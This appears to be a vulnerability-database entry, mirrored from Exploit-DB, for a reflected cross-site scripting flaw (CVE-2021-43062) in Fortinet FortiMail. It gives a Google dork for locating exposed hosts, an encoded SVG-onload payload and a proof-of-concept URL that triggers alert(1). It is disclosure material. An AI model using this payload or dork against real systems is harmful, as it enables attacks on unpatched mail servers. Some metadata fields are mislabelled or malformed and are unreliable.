Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

vendor:

Fortimail

by:

Braiant Giraldo Villa

8.8

CVSS

HIGH

Cross-site Scripting (XSS)

CWE

Product Name: Fortimail

Affected Version From: FortiMail version 7.0.1 and below

Affected Version To: FortiMail version 6.2.7 and below

Patch Exists: YES

Related CWE: CVE-2021-43062

CPE: a:fortinet:fortimail

Metasploit:

Other Scripts:

Tags: cve,cve2021,fortimail,xss,fortinet,edb

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Nuclei References: https://nvd.nist.gov/vuln/detail/CVE-2021-43062, https://www.fortiguard.com/psirt/FG-IR-21-185, https://www.exploit-db.com/exploits/50759, https://fortiguard.com/advisory/FG-IR-21-185

Nuclei Metadata: {'max-request': 1, 'vendor': 'fortinet', 'product': 'fortimail'}

Platforms Tested:

2022

Fortinet Fortimail 7.0.1 – Reflected Cross-Site Scripting (XSS)

An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized before being used in web page generation.

Source

Exploit-DB raw data:

# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)
# Google Dork: inurl:/fmlurlsvc/
# Date: 01-Feb-2022
# Exploit Author: Braiant Giraldo Villa
# Contact: @iron_fortress (Twitter)
# Vendor Homepage: https://www.fortinet.com/products/email-security
# Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online)
# Version: 
#	FortiMail version 7.0.1 and below
#	FortiMail version 6.4.5 and below
#	FortiMail version 6.2.7 and below
# CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)


1. Description:
An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.

2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E
3. Proof of Concept:
https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E

4. References
https://www.fortiguard.com/psirt/FG-IR-21-185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062